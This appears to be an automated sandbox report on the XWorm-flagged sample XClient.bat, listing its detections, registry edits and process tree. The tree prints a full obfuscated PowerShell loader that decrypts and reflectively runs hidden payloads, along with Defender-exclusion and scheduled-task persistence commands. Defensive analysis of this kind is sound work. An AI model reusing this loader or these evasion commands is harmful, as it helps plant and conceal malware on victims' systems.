Resubmissions
04-09-2024 03:02
240904-djne2svhpa 1004-09-2024 03:01
240904-djb21svhne 104-09-2024 01:09
240904-bhv3dstbjg 1003-09-2024 23:53
240903-3xrgaszhqm 1003-09-2024 23:29
240903-3gywfa1fna 1003-09-2024 23:26
240903-3ev2rs1erg 10Analysis
-
max time kernel
147s -
max time network
148s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
03-09-2024 23:53
Static task
static1
Behavioral task
behavioral1
Sample
XClient.bat
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
XClient.bat
Resource
win10v2004-20240802-en
General
-
Target
XClient.bat
-
Size
320KB
-
MD5
e0d59aedb927f0aad0b47eab247e5fbc
-
SHA1
8abe8db8e344729b0f78d83e540b17a31893ed92
-
SHA256
ab6fed54d7e8fcd47d2888aae95498968192e13aaab8f8a09880b602ea98e81c
-
SHA512
7459cba2a54a2e26e7464f9f4863b1fedb63cfa80ed2261ee69fd9c268c5d6bb54a4d01368d7ed987387016d786fb115f84afe97e192545b1f860b020c805e97
-
SSDEEP
6144:HQIYl64Q3Gx/E7X3YIzsUW4MN2nwaF0FbD/VdFzqEE/jeT3/:HQIh77X3t6+4VdFzoW/
Malware Config
Signatures
-
Contains code to disable Windows Defender 1 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
Processes:
resource yara_rule behavioral2/memory/728-382-0x000002ACD9A70000-0x000002ACD9A7E000-memory.dmp disable_win_def -
Detect Xworm Payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/728-49-0x000002ACD9260000-0x000002ACD92BA000-memory.dmp family_xworm -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 16 728 powershell.exe 26 728 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 728 powershell.exe 1924 powershell.exe 5036 powershell.exe 4452 powershell.exe 4748 powershell.exe 3708 powershell.exe 4964 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation WScript.exe -
Drops startup file 2 IoCs
Processes:
powershell.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System User.lnk powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System User.lnk powershell.exe -
Executes dropped EXE 1 IoCs
Processes:
System Userpid process 940 System User -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System User = "C:\\Users\\Admin\\AppData\\Roaming\\System User" powershell.exe -
Drops desktop.ini file(s) 17 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Users\Admin\3D Objects\desktop.ini powershell.exe File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini powershell.exe File opened for modification C:\Users\Admin\Links\desktop.ini powershell.exe File opened for modification F:\$RECYCLE.BIN\S-1-5-21-1302416131-1437503476-2806442725-1000\desktop.ini powershell.exe File opened for modification C:\Users\Admin\Contacts\desktop.ini powershell.exe File opened for modification C:\Users\Admin\Desktop\desktop.ini powershell.exe File opened for modification C:\Users\Admin\Favorites\desktop.ini powershell.exe File opened for modification C:\Users\Admin\OneDrive\desktop.ini powershell.exe File opened for modification C:\Users\Admin\Searches\desktop.ini powershell.exe File opened for modification C:\Users\Admin\Videos\desktop.ini powershell.exe File opened for modification C:\Users\Admin\Downloads\desktop.ini powershell.exe File opened for modification C:\Users\Admin\Pictures\desktop.ini powershell.exe File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini powershell.exe File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini powershell.exe File opened for modification C:\Users\Admin\Saved Games\desktop.ini powershell.exe File opened for modification C:\Users\Admin\Documents\desktop.ini powershell.exe File opened for modification C:\Users\Admin\Music\desktop.ini powershell.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 15 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\XBackground.bmp" powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
RdrCEF.exeRdrCEF.exeRdrCEF.exeAcroRd32.exeRdrCEF.exeRdrCEF.exeRdrCEF.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RdrCEF.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RdrCEF.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RdrCEF.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AcroRd32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RdrCEF.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RdrCEF.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RdrCEF.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
AcroRd32.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 AcroRd32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz AcroRd32.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
msedge.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Processes:
AcroRd32.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION AcroRd32.exe -
Modifies registry class 13 IoCs
Processes:
OpenWith.exepowershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\.ENC\ = "ENC_auto_file" OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\ENC_auto_file\shell\Read OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\Local Settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\ۈʳ OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\ENC_auto_file\shell OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\.ENC OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\敲d OpenWith.exe Set value (str) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\敲d\ = "ENC_auto_file" OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\Local Settings OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\ENC_auto_file OpenWith.exe Set value (str) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\ۈʳ\ = "ENC_auto_file" OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\ENC_auto_file\shell\Read\command OpenWith.exe Set value (str) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\ENC_auto_file\shell\Read\command\ = "\"C:\\Program Files (x86)\\Adobe\\Acrobat Reader DC\\Reader\\AcroRd32.exe\" \"%1\"" OpenWith.exe -
Runs net.exe
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 41 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeSystem Usermsedge.exemsedge.exeidentity_helper.exepid process 1924 powershell.exe 1924 powershell.exe 5036 powershell.exe 5036 powershell.exe 728 powershell.exe 728 powershell.exe 4452 powershell.exe 4452 powershell.exe 3708 powershell.exe 3708 powershell.exe 4964 powershell.exe 4964 powershell.exe 728 powershell.exe 940 System User 940 System User 3568 msedge.exe 3568 msedge.exe 1156 msedge.exe 1156 msedge.exe 3000 identity_helper.exe 3000 identity_helper.exe 728 powershell.exe 728 powershell.exe 728 powershell.exe 728 powershell.exe 728 powershell.exe 728 powershell.exe 728 powershell.exe 728 powershell.exe 728 powershell.exe 728 powershell.exe 728 powershell.exe 728 powershell.exe 728 powershell.exe 728 powershell.exe 728 powershell.exe 728 powershell.exe 728 powershell.exe 728 powershell.exe 728 powershell.exe 728 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
OpenWith.exepid process 4044 OpenWith.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs
Processes:
msedge.exepid process 1156 msedge.exe 1156 msedge.exe 1156 msedge.exe 1156 msedge.exe 1156 msedge.exe 1156 msedge.exe 1156 msedge.exe 1156 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 1924 powershell.exe Token: SeDebugPrivilege 5036 powershell.exe Token: SeIncreaseQuotaPrivilege 5036 powershell.exe Token: SeSecurityPrivilege 5036 powershell.exe Token: SeTakeOwnershipPrivilege 5036 powershell.exe Token: SeLoadDriverPrivilege 5036 powershell.exe Token: SeSystemProfilePrivilege 5036 powershell.exe Token: SeSystemtimePrivilege 5036 powershell.exe Token: SeProfSingleProcessPrivilege 5036 powershell.exe Token: SeIncBasePriorityPrivilege 5036 powershell.exe Token: SeCreatePagefilePrivilege 5036 powershell.exe Token: SeBackupPrivilege 5036 powershell.exe Token: SeRestorePrivilege 5036 powershell.exe Token: SeShutdownPrivilege 5036 powershell.exe Token: SeDebugPrivilege 5036 powershell.exe Token: SeSystemEnvironmentPrivilege 5036 powershell.exe Token: SeRemoteShutdownPrivilege 5036 powershell.exe Token: SeUndockPrivilege 5036 powershell.exe Token: SeManageVolumePrivilege 5036 powershell.exe Token: 33 5036 powershell.exe Token: 34 5036 powershell.exe Token: 35 5036 powershell.exe Token: 36 5036 powershell.exe Token: SeIncreaseQuotaPrivilege 5036 powershell.exe Token: SeSecurityPrivilege 5036 powershell.exe Token: SeTakeOwnershipPrivilege 5036 powershell.exe Token: SeLoadDriverPrivilege 5036 powershell.exe Token: SeSystemProfilePrivilege 5036 powershell.exe Token: SeSystemtimePrivilege 5036 powershell.exe Token: SeProfSingleProcessPrivilege 5036 powershell.exe Token: SeIncBasePriorityPrivilege 5036 powershell.exe Token: SeCreatePagefilePrivilege 5036 powershell.exe Token: SeBackupPrivilege 5036 powershell.exe Token: SeRestorePrivilege 5036 powershell.exe Token: SeShutdownPrivilege 5036 powershell.exe Token: SeDebugPrivilege 5036 powershell.exe Token: SeSystemEnvironmentPrivilege 5036 powershell.exe Token: SeRemoteShutdownPrivilege 5036 powershell.exe Token: SeUndockPrivilege 5036 powershell.exe Token: SeManageVolumePrivilege 5036 powershell.exe Token: 33 5036 powershell.exe Token: 34 5036 powershell.exe Token: 35 5036 powershell.exe Token: 36 5036 powershell.exe Token: SeIncreaseQuotaPrivilege 5036 powershell.exe Token: SeSecurityPrivilege 5036 powershell.exe Token: SeTakeOwnershipPrivilege 5036 powershell.exe Token: SeLoadDriverPrivilege 5036 powershell.exe Token: SeSystemProfilePrivilege 5036 powershell.exe Token: SeSystemtimePrivilege 5036 powershell.exe Token: SeProfSingleProcessPrivilege 5036 powershell.exe Token: SeIncBasePriorityPrivilege 5036 powershell.exe Token: SeCreatePagefilePrivilege 5036 powershell.exe Token: SeBackupPrivilege 5036 powershell.exe Token: SeRestorePrivilege 5036 powershell.exe Token: SeShutdownPrivilege 5036 powershell.exe Token: SeDebugPrivilege 5036 powershell.exe Token: SeSystemEnvironmentPrivilege 5036 powershell.exe Token: SeRemoteShutdownPrivilege 5036 powershell.exe Token: SeUndockPrivilege 5036 powershell.exe Token: SeManageVolumePrivilege 5036 powershell.exe Token: 33 5036 powershell.exe Token: 34 5036 powershell.exe Token: 35 5036 powershell.exe -
Suspicious use of FindShellTrayWindow 34 IoCs
Processes:
msedge.exepid process 1156 msedge.exe 1156 msedge.exe 1156 msedge.exe 1156 msedge.exe 1156 msedge.exe 1156 msedge.exe 1156 msedge.exe 1156 msedge.exe 1156 msedge.exe 1156 msedge.exe 1156 msedge.exe 1156 msedge.exe 1156 msedge.exe 1156 msedge.exe 1156 msedge.exe 1156 msedge.exe 1156 msedge.exe 1156 msedge.exe 1156 msedge.exe 1156 msedge.exe 1156 msedge.exe 1156 msedge.exe 1156 msedge.exe 1156 msedge.exe 1156 msedge.exe 1156 msedge.exe 1156 msedge.exe 1156 msedge.exe 1156 msedge.exe 1156 msedge.exe 1156 msedge.exe 1156 msedge.exe 1156 msedge.exe 1156 msedge.exe -
Suspicious use of SendNotifyMessage 32 IoCs
Processes:
msedge.exepid process 1156 msedge.exe 1156 msedge.exe 1156 msedge.exe 1156 msedge.exe 1156 msedge.exe 1156 msedge.exe 1156 msedge.exe 1156 msedge.exe 1156 msedge.exe 1156 msedge.exe 1156 msedge.exe 1156 msedge.exe 1156 msedge.exe 1156 msedge.exe 1156 msedge.exe 1156 msedge.exe 1156 msedge.exe 1156 msedge.exe 1156 msedge.exe 1156 msedge.exe 1156 msedge.exe 1156 msedge.exe 1156 msedge.exe 1156 msedge.exe 1156 msedge.exe 1156 msedge.exe 1156 msedge.exe 1156 msedge.exe 1156 msedge.exe 1156 msedge.exe 1156 msedge.exe 1156 msedge.exe -
Suspicious use of SetWindowsHookEx 8 IoCs
Processes:
powershell.exeOpenWith.exeAcroRd32.exepid process 728 powershell.exe 4044 OpenWith.exe 4044 OpenWith.exe 4044 OpenWith.exe 3376 AcroRd32.exe 3376 AcroRd32.exe 3376 AcroRd32.exe 3376 AcroRd32.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exenet.exepowershell.exeWScript.execmd.exenet.exepowershell.exemsedge.exedescription pid process target process PID 3176 wrote to memory of 4036 3176 cmd.exe net.exe PID 3176 wrote to memory of 4036 3176 cmd.exe net.exe PID 4036 wrote to memory of 3936 4036 net.exe net1.exe PID 4036 wrote to memory of 3936 4036 net.exe net1.exe PID 3176 wrote to memory of 1924 3176 cmd.exe powershell.exe PID 3176 wrote to memory of 1924 3176 cmd.exe powershell.exe PID 1924 wrote to memory of 5036 1924 powershell.exe powershell.exe PID 1924 wrote to memory of 5036 1924 powershell.exe powershell.exe PID 1924 wrote to memory of 1412 1924 powershell.exe WScript.exe PID 1924 wrote to memory of 1412 1924 powershell.exe WScript.exe PID 1412 wrote to memory of 5004 1412 WScript.exe cmd.exe PID 1412 wrote to memory of 5004 1412 WScript.exe cmd.exe PID 5004 wrote to memory of 2172 5004 cmd.exe net.exe PID 5004 wrote to memory of 2172 5004 cmd.exe net.exe PID 2172 wrote to memory of 4108 2172 net.exe net1.exe PID 2172 wrote to memory of 4108 2172 net.exe net1.exe PID 5004 wrote to memory of 728 5004 cmd.exe powershell.exe PID 5004 wrote to memory of 728 5004 cmd.exe powershell.exe PID 728 wrote to memory of 4452 728 powershell.exe powershell.exe PID 728 wrote to memory of 4452 728 powershell.exe powershell.exe PID 728 wrote to memory of 4748 728 powershell.exe powershell.exe PID 728 wrote to memory of 4748 728 powershell.exe powershell.exe PID 728 wrote to memory of 3708 728 powershell.exe powershell.exe PID 728 wrote to memory of 3708 728 powershell.exe powershell.exe PID 728 wrote to memory of 4964 728 powershell.exe powershell.exe PID 728 wrote to memory of 4964 728 powershell.exe powershell.exe PID 728 wrote to memory of 3352 728 powershell.exe schtasks.exe PID 728 wrote to memory of 3352 728 powershell.exe schtasks.exe PID 728 wrote to memory of 1156 728 powershell.exe msedge.exe PID 728 wrote to memory of 1156 728 powershell.exe msedge.exe PID 1156 wrote to memory of 4932 1156 msedge.exe msedge.exe PID 1156 wrote to memory of 4932 1156 msedge.exe msedge.exe PID 1156 wrote to memory of 3796 1156 msedge.exe msedge.exe PID 1156 wrote to memory of 3796 1156 msedge.exe msedge.exe PID 1156 wrote to memory of 3796 1156 msedge.exe msedge.exe PID 1156 wrote to memory of 3796 1156 msedge.exe msedge.exe PID 1156 wrote to memory of 3796 1156 msedge.exe msedge.exe PID 1156 wrote to memory of 3796 1156 msedge.exe msedge.exe PID 1156 wrote to memory of 3796 1156 msedge.exe msedge.exe PID 1156 wrote to memory of 3796 1156 msedge.exe msedge.exe PID 1156 wrote to memory of 3796 1156 msedge.exe msedge.exe PID 1156 wrote to memory of 3796 1156 msedge.exe msedge.exe PID 1156 wrote to memory of 3796 1156 msedge.exe msedge.exe PID 1156 wrote to memory of 3796 1156 msedge.exe msedge.exe PID 1156 wrote to memory of 3796 1156 msedge.exe msedge.exe PID 1156 wrote to memory of 3796 1156 msedge.exe msedge.exe PID 1156 wrote to memory of 3796 1156 msedge.exe msedge.exe PID 1156 wrote to memory of 3796 1156 msedge.exe msedge.exe PID 1156 wrote to memory of 3796 1156 msedge.exe msedge.exe PID 1156 wrote to memory of 3796 1156 msedge.exe msedge.exe PID 1156 wrote to memory of 3796 1156 msedge.exe msedge.exe PID 1156 wrote to memory of 3796 1156 msedge.exe msedge.exe PID 1156 wrote to memory of 3796 1156 msedge.exe msedge.exe PID 1156 wrote to memory of 3796 1156 msedge.exe msedge.exe PID 1156 wrote to memory of 3796 1156 msedge.exe msedge.exe PID 1156 wrote to memory of 3796 1156 msedge.exe msedge.exe PID 1156 wrote to memory of 3796 1156 msedge.exe msedge.exe PID 1156 wrote to memory of 3796 1156 msedge.exe msedge.exe PID 1156 wrote to memory of 3796 1156 msedge.exe msedge.exe PID 1156 wrote to memory of 3796 1156 msedge.exe msedge.exe PID 1156 wrote to memory of 3796 1156 msedge.exe msedge.exe PID 1156 wrote to memory of 3796 1156 msedge.exe msedge.exe PID 1156 wrote to memory of 3796 1156 msedge.exe msedge.exe PID 1156 wrote to memory of 3796 1156 msedge.exe msedge.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\XClient.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3176 -
C:\Windows\system32\net.exenet file2⤵
- Suspicious use of WriteProcessMemory
PID:4036 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 file3⤵PID:3936
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y+qf52DrQiYLUaozbbmw9JavODvF6+9CeZx0/k94u9k='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4WB4xmZ2PUqqywaBQpnlmg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vfVzQ=New-Object System.IO.MemoryStream(,$param_var); $AjFMf=New-Object System.IO.MemoryStream; $JrhbC=New-Object System.IO.Compression.GZipStream($vfVzQ, [IO.Compression.CompressionMode]::Decompress); $JrhbC.CopyTo($AjFMf); $JrhbC.Dispose(); $vfVzQ.Dispose(); $AjFMf.Dispose(); $AjFMf.ToArray();}function execute_function($param_var,$param2_var){ $AKLYU=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $eguYy=$AKLYU.EntryPoint; $eguYy.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\XClient.bat';$FsplU=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\XClient.bat').Split([Environment]::NewLine);foreach ($NLDPG in $FsplU) { if ($NLDPG.StartsWith(':: ')) { $wgQrx=$NLDPG.Substring(3); break; }}$payloads_var=[string[]]$wgQrx.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1924 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_555_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_555.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5036
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_555.vbs"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1412 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_555.bat" "4⤵
- Suspicious use of WriteProcessMemory
PID:5004 -
C:\Windows\system32\net.exenet file5⤵
- Suspicious use of WriteProcessMemory
PID:2172 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 file6⤵PID:4108
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y+qf52DrQiYLUaozbbmw9JavODvF6+9CeZx0/k94u9k='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4WB4xmZ2PUqqywaBQpnlmg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vfVzQ=New-Object System.IO.MemoryStream(,$param_var); $AjFMf=New-Object System.IO.MemoryStream; $JrhbC=New-Object System.IO.Compression.GZipStream($vfVzQ, [IO.Compression.CompressionMode]::Decompress); $JrhbC.CopyTo($AjFMf); $JrhbC.Dispose(); $vfVzQ.Dispose(); $AjFMf.Dispose(); $AjFMf.ToArray();}function execute_function($param_var,$param2_var){ $AKLYU=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $eguYy=$AKLYU.EntryPoint; $eguYy.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_555.bat';$FsplU=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_555.bat').Split([Environment]::NewLine);foreach ($NLDPG in $FsplU) { if ($NLDPG.StartsWith(':: ')) { $wgQrx=$NLDPG.Substring(3); break; }}$payloads_var=[string[]]$wgQrx.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- Adds Run key to start application
- Drops desktop.ini file(s)
- Sets desktop wallpaper using registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:728 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4452
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'6⤵
- Command and Scripting Interpreter: PowerShell
PID:4748
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\System User'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3708
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'System User'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4964
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "System User" /tr "C:\Users\Admin\AppData\Roaming\System User"6⤵
- Scheduled Task/Job: Scheduled Task
PID:3352
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\Desktop\How To Decrypt My Files.html6⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1156 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe86a046f8,0x7ffe86a04708,0x7ffe86a047187⤵PID:4932
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1928,3965902620211042924,4272112164319615069,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2100 /prefetch:27⤵PID:3796
-
-
